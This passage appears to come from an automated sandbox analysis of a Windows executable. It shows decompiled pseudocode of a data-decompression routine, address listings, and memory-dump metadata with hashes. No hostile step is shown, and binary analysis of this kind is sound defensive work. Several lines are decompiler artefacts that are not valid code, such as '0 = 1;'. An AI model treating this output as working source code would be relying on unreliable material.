                    													L139:
                    													__eax = __edx;
                    													__eflags = __eax - __ecx;
                    													if(__eax >= __ecx) {
                    														__edi = __edi - __eax;
                    														__eflags = __edi;
                    													} else {
                    														__ecx = __ecx - __eax;
                    														__edi = __ecx;
                    													}
                    													__eflags = __edi;
                    													if(__edi == 0) {
                    														goto L143;
                    													}
                    													L152:
                    													__ecx =  *(__ebp - 0x20);
                    													 *__eax =  *__ecx;
                    													__eax = __eax + 1;
                    													__ecx = __ecx + 1;
                    													__edi = __edi - 1;
                    													__eflags = __ecx - __esi[0x26e8];
                    													 *(__ebp - 0x30) = __eax;
                    													 *(__ebp - 0x20) = __ecx;
                    													 *(__ebp - 0x2c) = __edi;
                    													if(__ecx == __esi[0x26e8]) {
                    														__ecx =  &(__esi[0x6e8]);
                    														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                    													}
                    													_t357 =  &(__esi[1]);
                    													 *_t357 = __esi[1] - 1;
                    													__eflags =  *_t357;
                    												} while ( *_t357 != 0);
                    											}
                    											goto L23;
                    										case 6:
                    											L156:
                    											__eax =  *(__ebp - 0x2c);
                    											__edi =  *(__ebp - 0x30);
                    											__eflags = __eax;
                    											if(__eax != 0) {
                    												L172:
                    												__cl = __esi[2];
                    												 *__edi = __cl;
                    												__edi = __edi + 1;
                    												__eax = __eax - 1;
                    												 *(__ebp - 0x30) = __edi;
                    												 *(__ebp - 0x2c) = __eax;
                    												goto L23;
                    											}
                    											L157:
                    											__ecx = __esi[0x26e8];
                    											__eflags = __edi - __ecx;
                    											if(__edi != __ecx) {
                    												L163:
                    												__esi[0x26ea] = __edi;
                    												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                    												__edi = __esi[0x26ea];
                    												__ecx = __esi[0x26e9];
                    												__eflags = __edi - __ecx;
                    												 *(__ebp - 0x30) = __edi;
                    												if(__edi >= __ecx) {
                    													__eax = __esi[0x26e8];
                    													__eax = __esi[0x26e8] - __edi;
                    													__eflags = __eax;
                    												} else {
                    													__ecx = __ecx - __edi;
                    													__eax = __ecx - __edi - 1;
                    												}
                    												__edx = __esi[0x26e8];
                    												__eflags = __edi - __edx;
                    												 *(__ebp - 8) = __edx;
                    												if(__edi == __edx) {
                    													__edx =  &(__esi[0x6e8]);
                    													__eflags = __ecx - __edx;
                    													if(__ecx != __edx) {
                    														__edi = __edx;
                    														__eflags = __edi - __ecx;
                    														 *(__ebp - 0x30) = __edi;
                    														if(__edi >= __ecx) {
                    															__eax =  *(__ebp - 8);
                    															__eax =  *(__ebp - 8) - __edi;
                    															__eflags = __eax;
                    														} else {
                    															__ecx = __ecx - __edi;
                    															__eax = __ecx;
                    														}
                    													}
                    												}
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													goto L183;
                    												} else {
                    													goto L172;
                    												}
                    											}
                    											L158:
                    											__eax = __esi[0x26e9];
                    											__edx =  &(__esi[0x6e8]);
                    											__eflags = __eax - __edx;
                    											if(__eax == __edx) {
                    												goto L163;
                    											}
                    											L159:
                    											__edi = __edx;
                    											__eflags = __edi - __eax;
                    											if(__edi >= __eax) {
                    												__ecx = __ecx - __edi;
                    												__eflags = __ecx;
                    												__eax = __ecx;
                    											} else {
                    												__eax = __eax - __edi;
                    												__eax = __eax - 1;
                    											}
                    											__eflags = __eax;
                    											if(__eax != 0) {
                    												goto L172;
                    											} else {
                    												goto L163;
                    											}
                    										case 7:
                    											L173:
                    											__eflags = __ebx - 7;
                    											if(__ebx > 7) {
                    												__ebx = __ebx - 8;
                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                    												_t380 = __ebp - 0x38;
                    												 *_t380 =  *(__ebp - 0x38) - 1;
                    												__eflags =  *_t380;
                    											}
                    											goto L175;
                    										case 8:
                    											L4:
                    											while(_t425 < 3) {
                    												if( *(_t448 - 0x34) == 0) {
                    													goto L182;
                    												} else {
                    													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                    													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                    													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                    													_t425 = _t425 + 8;
                    													continue;
                    												}
                    											}
                    											_t425 = _t425 - 3;
                    											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                    											_t406 =  *(_t448 - 0x40) & 0x00000007;
                    											asm("sbb ecx, ecx");
                    											_t408 = _t406 >> 1;
                    											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                    											if(_t408 == 0) {
                    												L24:
                    												 *_t446 = 9;
                    												_t436 = _t425 & 0x00000007;
                    												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                    												_t425 = _t425 - _t436;
                    												goto L180;
                    											}
                    											L6:
                    											_t411 = _t408 - 1;
                    											if(_t411 == 0) {
                    												L13:
                    												__eflags =  *0x42daf0;
                    												if( *0x42daf0 != 0) {
                    													L22:
                    													_t412 =  *0x409364; // 0x9
                    													_t446[4] = _t412;
                    													_t413 =  *0x409368; // 0x5
                    													_t446[4] = _t413;
                    													_t414 =  *0x42c96c; // 0x0
                    													_t446[5] = _t414;
                    													_t415 =  *0x42c968; // 0x0
                    													_t446[6] = _t415;
                    													L23:
                    													 *_t446 =  *_t446 & 0x00000000;
                    													goto L180;
                    												} else {
                    													_t26 = _t448 - 8;
                    													 *_t26 =  *(_t448 - 8) & 0x00000000;
                    													__eflags =  *_t26;
                    													_t416 = 0x42c970;
                    													goto L15;
                    													L20:
                    													 *_t416 = _t438;
                    													_t416 = _t416 + 4;
                    													__eflags = _t416 - 0x42cdf0;
                    													if(_t416 < 0x42cdf0) {
                    														L15:
                    														__eflags = _t416 - 0x42cbac;
                    														_t438 = 8;
                    														if(_t416 > 0x42cbac) {
                    															__eflags = _t416 - 0x42cd70;
                    															if(_t416 >= 0x42cd70) {
                    																__eflags = _t416 - 0x42cdd0;
                    																if(_t416 < 0x42cdd0) {
                    																	_t438 = 7;
                    																}
                    															} else {
                    																_t438 = 9;
                    															}
                    														}
                    														goto L20;
                    													} else {
                    														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
                    														_push(0x1e);
                    														_pop(_t440);
                    														_push(5);
                    														_pop(_t419);
                    														memset(0x42c970, _t419, _t440 << 2);
                    														_t450 = _t450 + 0xc;
                    														_t442 = 0x42c970 + _t440;
                    														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
                    														 *0x42daf0 =  *0x42daf0 + 1;
                    														__eflags =  *0x42daf0;
                    														goto L22;
                    													}
                    												}
                    											}
                    											L7:
                    											_t423 = _t411 - 1;
                    											if(_t423 == 0) {
                    												 *_t446 = 0xb;
                    												goto L180;
                    											}
                    											L8:
                    											if(_t423 != 1) {
                    												goto L180;
                    											}
                    											goto L9;
                    										case 9:
                    											while(1) {
                    												L27:
                    												__eflags = __ebx - 0x10;
                    												if(__ebx >= 0x10) {
                    													break;
                    												}
                    												L25:
                    												__eflags =  *(__ebp - 0x34);
                    												if( *(__ebp - 0x34) == 0) {
                    													goto L182;
                    												}
                    												L26:
                    												__eax =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    												__ecx = __ebx;
                    												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    												__ebx = __ebx + 8;
                    												__eflags = __ebx;
                    											}
                    											L28:
                    											__eax =  *(__ebp - 0x40);
                    											__ebx = 0;
                    											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                    											 *(__ebp - 0x40) = 0;
                    											__eflags = __eax;
                    											__esi[1] = __eax;
                    											if(__eax == 0) {
                    												goto L53;
                    											}
                    											L29:
                    											_push(0xa);
                    											_pop(__eax);
                    											goto L54;
                    										case 0xa:
                    											L30:
                    											__eflags =  *(__ebp - 0x34);
                    											if( *(__ebp - 0x34) == 0) {
                    												goto L182;
                    											}
                    											L31:
                    											__eax =  *(__ebp - 0x2c);
                    											__eflags = __eax;
                    											if(__eax != 0) {
                    												L48:
                    												__eflags = __eax -  *(__ebp - 0x34);
                    												if(__eax >=  *(__ebp - 0x34)) {
                    													__eax =  *(__ebp - 0x34);
                    												}
                    												__ecx = __esi[1];
                    												__eflags = __ecx - __eax;
                    												__edi = __ecx;
                    												if(__ecx >= __eax) {
                    													__edi = __eax;
                    												}
                    												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                    												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                    												_t80 =  &(__esi[1]);
                    												 *_t80 = __esi[1] - __edi;
                    												__eflags =  *_t80;
                    												if( *_t80 == 0) {
                    													L53:
                    													__eax = __esi[0x145];
                    													L54:
                    													 *__esi = __eax;
                    												}
                    												goto L180;
                    											}
                    											L32:
                    											__ecx = __esi[0x26e8];
                    											__edx =  *(__ebp - 0x30);
                    											__eflags = __edx - __ecx;
                    											if(__edx != __ecx) {
                    												L38:
                    												__esi[0x26ea] = __edx;
                    												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                    												__edx = __esi[0x26ea];
                    												__ecx = __esi[0x26e9];
                    												__eflags = __edx - __ecx;
                    												 *(__ebp - 0x30) = __edx;
                    												if(__edx >= __ecx) {
                    													__eax = __esi[0x26e8];
                    													__eax = __esi[0x26e8] - __edx;
                    													__eflags = __eax;
                    												} else {
                    													__ecx = __ecx - __edx;
                    													__eax = __ecx - __edx - 1;
                    												}
                    												__edi = __esi[0x26e8];
                    												 *(__ebp - 0x2c) = __eax;
                    												__eflags = __edx - __edi;
                    												if(__edx == __edi) {
                    													__edx =  &(__esi[0x6e8]);
                    													__eflags = __edx - __ecx;
                    													if(__eflags != 0) {
                    														 *(__ebp - 0x30) = __edx;
                    														if(__eflags >= 0) {
                    															__edi = __edi - __edx;
                    															__eflags = __edi;
                    															__eax = __edi;
                    														} else {
                    															__ecx = __ecx - __edx;
                    															__eax = __ecx;
                    														}
                    														 *(__ebp - 0x2c) = __eax;
                    													}
                    												}
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													goto L183;
                    												} else {
                    													goto L48;
                    												}
                    											}
                    											L33:
                    											__eax = __esi[0x26e9];
                    											__edi =  &(__esi[0x6e8]);
                    											__eflags = __eax - __edi;
                    											if(__eax == __edi) {
                    												goto L38;
                    											}
                    											L34:
                    											__edx = __edi;
                    											__eflags = __edx - __eax;
                    											 *(__ebp - 0x30) = __edx;
                    											if(__edx >= __eax) {
                    												__ecx = __ecx - __edx;
                    												__eflags = __ecx;
                    												__eax = __ecx;
                    											} else {
                    												__eax = __eax - __edx;
                    												__eax = __eax - 1;
                    											}
                    											__eflags = __eax;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__eax != 0) {
                    												goto L48;
                    											} else {
                    												goto L38;
                    											}
                    										case 0xb:
                    											goto L56;
                    										case 0xc:
                    											L60:
                    											__esi[1] = __esi[1] >> 0xa;
                    											__eax = (__esi[1] >> 0xa) + 4;
                    											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                    												goto L68;
                    											}
                    											goto L61;
                    										case 0xd:
                    											while(1) {
                    												L93:
                    												__eax = __esi[1];
                    												__ecx = __esi[2];
                    												__edx = __eax;
                    												__eax = __eax & 0x0000001f;
                    												__edx = __edx >> 5;
                    												__eax = __edx + __eax + 0x102;
                    												__eflags = __esi[2] - __eax;
                    												if(__esi[2] >= __eax) {
                    													break;
                    												}
                    												L73:
                    												__eax = __esi[0x143];
                    												while(1) {
                    													L76:
                    													__eflags = __ebx - __eax;
                    													if(__ebx >= __eax) {
                    														break;
                    													}
                    													L74:
                    													__eflags =  *(__ebp - 0x34);
                    													if( *(__ebp - 0x34) == 0) {
                    														goto L182;
                    													}
                    													L75:
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                    													__ecx = __ebx;
                    													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    													__ebx = __ebx + 8;
                    													__eflags = __ebx;
                    												}
                    												L77:
                    												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                    												__eax = __eax &  *(__ebp - 0x40);
                    												__ecx = __esi[0x144];
                    												__eax = __esi[0x144] + __eax * 4;
                    												__edx =  *(__eax + 1) & 0x000000ff;
                    												__eax =  *(__eax + 2) & 0x0000ffff;
                    												__eflags = __eax - 0x10;
                    												 *(__ebp - 0x14) = __eax;
                    												if(__eax >= 0x10) {
                    													L79:
                    													__eflags = __eax - 0x12;
                    													if(__eax != 0x12) {
                    														__eax = __eax + 0xfffffff2;
                    														 *(__ebp - 8) = 3;
                    													} else {
                    														_push(7);
                    														 *(__ebp - 8) = 0xb;
                    														_pop(__eax);
                    													}
                    													while(1) {
                    														L84:
                    														__ecx = __eax + __edx;
                    														__eflags = __ebx - __eax + __edx;
                    														if(__ebx >= __eax + __edx) {
                    															break;
                    														}
                    														L82:
                    														__eflags =  *(__ebp - 0x34);
                    														if( *(__ebp - 0x34) == 0) {
                    															goto L182;
                    														}
                    														L83:
                    														__ecx =  *(__ebp - 0x38);
                    														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                    														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                    														__ecx = __ebx;
                    														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                    														__ebx = __ebx + 8;
                    														__eflags = __ebx;
                    													}
                    													L85:
                    													__ecx = __edx;
                    													__ebx = __ebx - __edx;
                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                    													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                    													__edx =  *(__ebp - 8);
                    													__ebx = __ebx - __eax;
                    													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                    													__ecx = __eax;
                    													__eax = __esi[1];
                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                    													__ecx = __esi[2];
                    													__eax = __eax >> 5;
                    													__edi = __eax >> 0x00000005 & 0x0000001f;
                    													__eax = __eax & 0x0000001f;
                    													__eax = __edi + __eax + 0x102;
                    													__edi = __edx + __ecx;
                    													__eflags = __edx + __ecx - __eax;
                    													if(__edx + __ecx > __eax) {
                    														goto L9;
                    													}
                    													L86:
                    													__eflags =  *(__ebp - 0x14) - 0x10;
                    													if( *(__ebp - 0x14) != 0x10) {
                    														L89:
                    														__edi = 0;
                    														__eflags = 0;
                    														L90:
                    														__eax = __esi + 0xc + __ecx * 4;
                    														do {
                    															L91:
                    															 *__eax = __edi;
                    															__ecx = __ecx + 1;
                    															__eax = __eax + 4;
                    															__edx = __edx - 1;
                    															__eflags = __edx;
                    														} while (__edx != 0);
                    														__esi[2] = __ecx;
                    														continue;
                    													}
                    													L87:
                    													__eflags = __ecx - 1;
                    													if(__ecx < 1) {
                    														goto L9;
                    													}
                    													L88:
                    													__edi =  *(__esi + 8 + __ecx * 4);
                    													goto L90;
                    												}
                    												L78:
                    												__ecx = __edx;
                    												__ebx = __ebx - __edx;
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                    												__ecx = __esi[2];
                    												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                    												__esi[2] = __esi[2] + 1;
                    											}
                    											L94:
                    											__eax = __esi[1];
                    											__esi[0x144] = __esi[0x144] & 0x00000000;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                    											__edi = __eax;
                    											__eax = __eax >> 5;
                    											__edi = __edi & 0x0000001f;
                    											__ecx = 0x101;
                    											__eax = __eax & 0x0000001f;
                    											__edi = __edi + 0x101;
                    											__eax = __eax + 1;
                    											__edx = __ebp - 0xc;
                    											 *(__ebp - 0x14) = __eax;
                    											 &(__esi[0x148]) = __ebp - 4;
                    											 *(__ebp - 4) = 9;
                    											__ebp - 0x18 =  &(__esi[3]);
                    											 *(__ebp - 0x10) = 6;
                    											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                    											__eflags =  *(__ebp - 4);
                    											if( *(__ebp - 4) == 0) {
                    												__eax = __eax | 0xffffffff;
                    												__eflags = __eax;
                    											}
                    											__eflags = __eax;
                    											if(__eax != 0) {
                    												goto L9;
                    											} else {
                    												L97:
                    												__ebp - 0xc =  &(__esi[0x148]);
                    												__ebp - 0x10 = __ebp - 0x1c;
                    												__eax = __esi + 0xc + __edi * 4;
                    												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                    												__eflags = __eax;
                    												if(__eax != 0) {
                    													goto L9;
                    												}
                    												L98:
                    												__eax =  *(__ebp - 0x10);
                    												__eflags =  *(__ebp - 0x10);
                    												if( *(__ebp - 0x10) != 0) {
                    													L100:
                    													__cl =  *(__ebp - 4);
                    													 *__esi =  *__esi & 0x00000000;
                    													__eflags =  *__esi;
                    													__esi[4] = __al;
                    													__eax =  *(__ebp - 0x18);
                    													__esi[5] =  *(__ebp - 0x18);
                    													__eax =  *(__ebp - 0x1c);
                    													__esi[4] = __cl;
                    													__esi[6] =  *(__ebp - 0x1c);
                    													goto L101;
                    												}
                    												L99:
                    												__eflags = __edi - 0x101;
                    												if(__edi > 0x101) {
                    													goto L9;
                    												}
                    												goto L100;
                    											}
                    										case 0xe:
                    											goto L9;
                    										case 0xf:
                    											L175:
                    											__eax =  *(__ebp - 0x30);
                    											__esi[0x26ea] =  *(__ebp - 0x30);
                    											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                    											__ecx = __esi[0x26ea];
                    											__edx = __esi[0x26e9];
                    											__eflags = __ecx - __edx;
                    											 *(__ebp - 0x30) = __ecx;
                    											if(__ecx >= __edx) {
                    												__eax = __esi[0x26e8];
                    												__eax = __esi[0x26e8] - __ecx;
                    												__eflags = __eax;
                    											} else {
                    												__edx = __edx - __ecx;
                    												__eax = __edx - __ecx - 1;
                    											}
                    											__eflags = __ecx - __edx;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__ecx != __edx) {
                    												L183:
                    												__edi = 0;
                    												goto L10;
                    											} else {
                    												L179:
                    												__eax = __esi[0x145];
                    												__eflags = __eax - 8;
                    												 *__esi = __eax;
                    												if(__eax != 8) {
                    													L184:
                    													0 = 1;
                    													goto L10;
                    												}
                    												goto L180;
                    											}
                    									}
                    								}
                    								L181:
                    								goto L9;
                    							}
                    							L70:
                    							if( *__edi == __eax) {
                    								goto L72;
                    							}
                    							L71:
                    							__esi[2] = __esi[2] & __eax;
                    							 *__esi = 0xd;
                    							goto L93;
                    						}
                    					}
                    				}
                    				L182:
                    				_t443 = 0;
                    				_t446[0x147] =  *(_t448 - 0x40);
                    				_t446[0x146] = _t425;
                    				( *(_t448 + 8))[1] = 0;
                    				goto L11;
                    			}

                    0x00405f20
                    0x00405f25
                    0x00405f27
                    0x00405f2a
                    0x00405f2d
                    0x00405f2d
                    0x00405f2d
                    0x00405f35
                    0x00405f35
                    0x00405f38
                    0x00405f3a
                    0x00405f3f
                    0x00405f42
                    0x00405f44
                    0x00405f47
                    0x00000000
                    0x00000000
                    0x00405f4d
                    0x00405f4d
                    0x00405f4f
                    0x00000000
                    0x00000000
                    0x00405f55
                    0x00405f55
                    0x00405f59
                    0x00000000
                    0x00000000
                    0x00405f5f
                    0x00405f5f
                    0x00405f62
                    0x00405f64
                    0x00406002
                    0x00406002
                    0x00406005
                    0x00406007
                    0x00406007
                    0x0040600a
                    0x0040600d
                    0x0040600f
                    0x00406011
                    0x00406013
                    0x00406013
                    0x0040601c
                    0x00406021
                    0x00406024
                    0x00406027
                    0x0040602a
                    0x0040602d
                    0x0040602d
                    0x0040602d
                    0x00406030
                    0x00406036
                    0x00406036
                    0x0040603c
                    0x0040603c
                    0x0040603c
                    0x00000000
                    0x00406030
                    0x00405f6a
                    0x00405f6a
                    0x00405f70
                    0x00405f73
                    0x00405f75
                    0x00405fa0
                    0x00405fa3
                    0x00405fa9
                    0x00405fae
                    0x00405fb4
                    0x00405fba
                    0x00405fbc
                    0x00405fbf
                    0x00405fc8
                    0x00405fce
                    0x00405fce
                    0x00405fc1
                    0x00405fc3
                    0x00405fc5
                    0x00405fc5
                    0x00405fd0
                    0x00405fd6
                    0x00405fd9
                    0x00405fdb
                    0x00405fdd
                    0x00405fe3
                    0x00405fe5
                    0x00405fe7
                    0x00405fea
                    0x00405ff3
                    0x00405ff3
                    0x00405ff5
                    0x00405fec
                    0x00405fec
                    0x00405fef
                    0x00405fef
                    0x00405ff7
                    0x00405ff7
                    0x00405fe5
                    0x00405ffa
                    0x00405ffc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ffc
                    0x00405f77
                    0x00405f77
                    0x00405f7d
                    0x00405f83
                    0x00405f85
                    0x00000000
                    0x00000000
                    0x00405f87
                    0x00405f87
                    0x00405f89
                    0x00405f8b
                    0x00405f8e
                    0x00405f95
                    0x00405f95
                    0x00405f97
                    0x00405f90
                    0x00405f90
                    0x00405f92
                    0x00405f92
                    0x00405f99
                    0x00405f9b
                    0x00405f9e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004060a2
                    0x004060a5
                    0x004060a8
                    0x004060ae
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406285
                    0x00406285
                    0x00406285
                    0x00406288
                    0x0040628b
                    0x0040628d
                    0x00406290
                    0x00406296
                    0x0040629d
                    0x0040629f
                    0x00000000
                    0x00000000
                    0x00406173
                    0x00406173
                    0x0040619b
                    0x0040619b
                    0x0040619b
                    0x0040619d
                    0x00000000
                    0x00000000
                    0x0040617b
                    0x0040617b
                    0x0040617f
                    0x00000000
                    0x00000000
                    0x00406185
                    0x00406185
                    0x00406188
                    0x0040618b
                    0x0040618e
                    0x00406190
                    0x00406192
                    0x00406195
                    0x00406198
                    0x00406198
                    0x00406198
                    0x0040619f
                    0x0040619f
                    0x004061a7
                    0x004061aa
                    0x004061b0
                    0x004061b3
                    0x004061b7
                    0x004061bb
                    0x004061be
                    0x004061c1
                    0x004061d9
                    0x004061d9
                    0x004061dc
                    0x004061ea
                    0x004061ed
                    0x004061de
                    0x004061de
                    0x004061e0
                    0x004061e7
                    0x004061e7
                    0x00406216
                    0x00406216
                    0x00406216
                    0x00406219
                    0x0040621b
                    0x00000000
                    0x00000000
                    0x004061f6
                    0x004061f6
                    0x004061fa
                    0x00000000
                    0x00000000
                    0x00406200
                    0x00406200
                    0x00406203
                    0x00406206
                    0x00406209
                    0x0040620b
                    0x0040620d
                    0x00406210
                    0x00406213
                    0x00406213
                    0x00406213
                    0x0040621d
                    0x0040621d
                    0x0040621f
                    0x00406221
                    0x0040622c
                    0x0040622f
                    0x00406232
                    0x00406234
                    0x00406236
                    0x00406238
                    0x0040623b
                    0x0040623e
                    0x00406243
                    0x00406246
                    0x00406249
                    0x0040624c
                    0x00406253
                    0x00406256
                    0x00406258
                    0x00000000
                    0x00000000
                    0x0040625e
                    0x0040625e
                    0x00406262
                    0x00406273
                    0x00406273
                    0x00406273
                    0x00406275
                    0x00406275
                    0x00406279
                    0x00406279
                    0x00406279
                    0x0040627b
                    0x0040627c
                    0x0040627f
                    0x0040627f
                    0x0040627f
                    0x00406282
                    0x00000000
                    0x00406282
                    0x00406264
                    0x00406264
                    0x00406267
                    0x00000000
                    0x00000000
                    0x0040626d
                    0x0040626d
                    0x00000000
                    0x0040626d
                    0x004061c3
                    0x004061c3
                    0x004061c5
                    0x004061c7
                    0x004061ca
                    0x004061cd
                    0x004061d1
                    0x004061d1
                    0x004062a5
                    0x004062a5
                    0x004062a8
                    0x004062af
                    0x004062b3
                    0x004062b5
                    0x004062b8
                    0x004062bb
                    0x004062c0
                    0x004062c3
                    0x004062c5
                    0x004062c6
                    0x004062c9
                    0x004062d4
                    0x004062d7
                    0x004062ee
                    0x004062f3
                    0x004062fa
                    0x004062ff
                    0x00406303
                    0x00406305
                    0x00406305
                    0x00406305
                    0x00406308
                    0x0040630a
                    0x00000000
                    0x00406310
                    0x00406310
                    0x00406314
                    0x0040631f
                    0x00406332
                    0x00406337
                    0x0040633c
                    0x0040633e
                    0x00000000
                    0x00000000
                    0x00406344
                    0x00406344
                    0x00406347
                    0x00406349
                    0x00406357
                    0x00406357
                    0x0040635a
                    0x0040635a
                    0x0040635d
                    0x00406360
                    0x00406363
                    0x00406366
                    0x00406369
                    0x0040636c
                    0x00000000
                    0x0040636c
                    0x0040634b
                    0x0040634b
                    0x00406351
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406351
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004066f0
                    0x004066f0
                    0x004066f6
                    0x004066fc
                    0x00406701
                    0x00406707
                    0x0040670d
                    0x0040670f
                    0x00406712
                    0x0040671b
                    0x00406721
                    0x00406721
                    0x00406714
                    0x00406716
                    0x00406718
                    0x00406718
                    0x00406723
                    0x00406725
                    0x00406728
                    0x00406763
                    0x00406763
                    0x00000000
                    0x0040672a
                    0x0040672a
                    0x0040672a
                    0x00406730
                    0x00406733
                    0x00406735
                    0x0040676a
                    0x0040676c
                    0x00000000
                    0x0040676c
                    0x00000000
                    0x00406735
                    0x00000000
                    0x00405d74
                    0x00406742
                    0x00000000
                    0x00406742
                    0x00406156
                    0x00406158
                    0x00000000
                    0x00000000
                    0x0040615a
                    0x0040615a
                    0x0040615d
                    0x00000000
                    0x0040615d
                    0x004060a2
                    0x00406063
                    0x00406747
                    0x0040674a
                    0x0040674c
                    0x00406755
                    0x0040675b
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                    • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                    • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                    • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction ID: 03f688c33c67f0290e1fe47f283e22e9a8d4fea8297bf4afbb40a2ffb3a49bfd
                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                    • Instruction Fuzzy Hash: 3CC1523220969709EB5DC779C47453EBEE19BA26F1317076ED8B2CB1D8FF20C5649620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp
                    Similarity
                    • API ID:
